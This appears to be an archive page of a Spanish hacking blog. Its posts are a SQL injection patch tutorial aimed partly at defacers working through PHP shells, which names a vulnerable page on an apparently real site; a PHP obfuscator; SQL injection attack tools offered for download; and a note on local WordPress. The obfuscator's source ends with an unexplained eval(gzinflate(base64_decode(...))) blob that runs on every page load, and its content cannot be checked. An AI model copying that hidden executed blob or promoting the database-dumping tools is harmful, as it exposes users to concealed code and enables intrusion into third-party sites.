Mostrando entradas con la etiqueta localhost. Mostrar todas las entradas
Mostrando entradas con la etiqueta localhost. Mostrar todas las entradas

martes, 21 de enero de 2014

Arreglando bug SQL Injection PHP

2 comentarios, Publicado por OverNet en martes, enero 21, 2014 ,

Arreglando bug SQL Injection de manera rápida y sencilla

Este tutorial, va dedicado a los novatos que principalmente explotan el bug y defacean y se van sin arreglarlo.
*En este post encontraras como realizar una Inyección SQL.

Para poder arreglar el bug, necesitamos tener permisos de escritura (para los que trabajan con PHP Shells), de lo contrario este tutorial no te servirá pero sí a los webmasters que quieran evitar este tipo de ataque.

Bueno tenemos la siguiente página:

Como se puede apreciar es vulnerable a SQL Injection, observen la comilla.
Hay que tomar nota de esto, nos basamos en el archivo y la variable que se ejecuta:
http://www.avcnoticias.com.mx/bb/haxor.php?id='

* Tomamos nota *
- Directorio o carpeta:
/bb/
- Archivo vulnerable: haxor.php
- Variable vulnerabl SQLi: id=
- Lineas a modificar: 19 & 25 (Se identifican gracias al error que se imprime)

Nos vamos a nuestra PHP Shell o FTP (En caso de ser el propietario) y buscamos el Directorio (/bb/ en mi caso) y entre ella descargamos o modificamos el Archivo vulnerable (haxor.php en mi caso)

Lo editamos con el Bloc de Notas/Adobe Dreamweaver o cualquier otro editor de texto y buscamos la variable que es en nuestro caso id
(si estas en Adobe Dreamweaver CTRL + f, si estas en bloc de notas CTRL + b)
Y encontramos algo por el estilo:

Se observa claramente el código que no tiene ningún filtro de seguridad y que la variable es vulnerable a este tipo de ataques.
Ahora vamos arreglar este fallo tenemos en esta linea que se ejecuta la variable:

  1. $id=$_GET['id'];  
  2. $consulta = "SELECT * from nota where id_nota=$id";  
  3. $rs = mysql_query($consulta,$conn);  

Con la función sprintf() y mysql_real_escape_string() podemos arreglar este fallo:

  1. $consulta = sprintf("SELECT * from nota where id_nota='%s'",  
  2. mysql_real_escape_string($id));   
Y listo, sí incluimos la comilla en la variable ya no nos muestra ningún error.

martes, 18 de diciembre de 2012

Simple PHP Obfuscator

Publicado por OverNet en martes, diciembre 18, 2012 ,

PHPc0de: Obfuscation

Una herramienta simple para obfuscar o encriptar cualquier código en PHP; HTML/TXT. La finalidad de obfuscar es evitar que otras personas puedan ver el código fuente original directamente desde el archivo, para hacerlo tendrán que desencriptar el código obfuscado. 
* También se puede descodificar
Los desarrolladores web suelen proteger su código fuente o más bien dicho su propiedad intelectual obfuscando el código y así evitar que cualquier neófito pueda modificar el código a su gusto.

Code Source PHP



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!-- Coded By OverNET -->
<title>PHPc0de => Obfuscation!</title>
<center>
<h1>Obfuscar codigo PHP &amp; HTML/TXT</h1>
<? $file = $_POST['obfuscar'];
$gestor = stripslashes($file);
// Función (base64_encode(gzdeflate());
$texto = base64_encode(gzdeflate($gestor));?>

<form method="POST"><p>
<textarea name="obfuscar" cols="50" rows="10" id="xd"><? 
if($file) {
$_POST['obfuscar'];
echo $gestor;
}else{
 print 'Escriba texto o codigo';
}
?>
</textarea>
  </p>
  <p>
    <input type="submit" name="obfuscarme" value="                             Obfuscar!                           " />
  </p><b>
  <p>Texto ofuscado:</p>
  <p>
  <label for="textarea"></label>
    <textarea cols="50" rows="5" readonly="readonly" id="obfuscar"><?php if($file) {$_POST['obfuscar'];echo "<? eval(gzinflate(base64_decode('".$texto."'))); ?>";}else{
 echo 'Haga clic en el boton -Obfuscar!- para codificar!';}
?></textarea>
  </p>
</form>
<? 
## Prueba de codificación (Copyright) x3
eval(gzinflate(base64_decode('DcnNDkMwAADgx8HN/yqLg5gtaDdSHHZZrK3GT5hiok+/fdePfetB5bIdm6FemfquF+baL8rIRJmq4MOA8n6NBRAIgzWB0VjhaFqKrpRt6SUFcTJMq9xzTwjMzgF5n1JaWMKKTY/vj/bg2Yz3LSS9mdYOEnyKIQEztZ7y/4IcOxQd3orQti7oo4eSmnhkekWb0oD5LQh8X9E07fwD'))); ?>
</center>
<!-- Coded By OverNET -->

domingo, 13 de noviembre de 2011

SQL Injection Tool (Online && PHP code)

3 comentarios, Publicado por OverNet en domingo, noviembre 13, 2011 ,
Sql InyeXion Scanner F-Security Team

SQLi Tool Online

Información sobre el Autor:
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
Caracteristicas:
  • Vuln Number Found
  • Column Brute Force
  • Table Brute Force
  • Load_file()
  • Show Info Server
Download File | https://sites.google.com/site/rootnetworking/SQLI.tar
Demo Online | http://goo.gl/2WXgb

Instant WordPress: WordPress en Windows (Localhost)

0 comentarios, Publicado por OverNet en domingo, noviembre 13, 2011 ,


Todos los que usamos WordPress como CMS siempre tenemos que hacer pruebas en los themes o plugins, pero es mucho más cómodo tenerlo instalado en el servidor local ya que podemos hacer todo más rápido sin “romper” el blog original. Instant WordPress es una excelente herramienta que nos permite instalar WordPress en local en Windows.

Es una especie de WordPress portable que se puede instalar en un pendrive o en el disco local, luego al abrir el panel de opciones tenemos accesos directos a ciertas herramientas como el panel de administración de WordPress, la página principal del blog, el directorio de plugins, el directorio de themes y phpMyAdmin.

Instant WordPress contiene lo siguiente:
  • WordPress 3.2
  • Apache 2.2.15 (Win32)
  • PHP 5.3.2
  • MySQL 5.1.46-community-nt
A continuación les dejo un video demo de Instant WordPress:


Enlace | Instant WordPress
Visto en | http://www.puntogeek.com/2011/11/12/instant-wordpress-instalar-wordpress-en-local-windows/

sábado, 12 de noviembre de 2011

SQLi Tool By ECEK2 & OON_BOY [PHP]

0 comentarios, Publicado por OverNet en sábado, noviembre 12, 2011 ,
SQL INJECTION TOOL BY ECEK2 & OON_BOY


SQLi Tool en PHP (Caracteristicas):
  • Find Column & Info.
  • Show DataBase.
  • Find Tables.
  • Find Columns.
  • Dump DataBase.

Demostración Online | http://goo.gl/Np1P1
Descargar archivo PHP | https://sites.google.com/site/rootnetworking/SQLiTool.php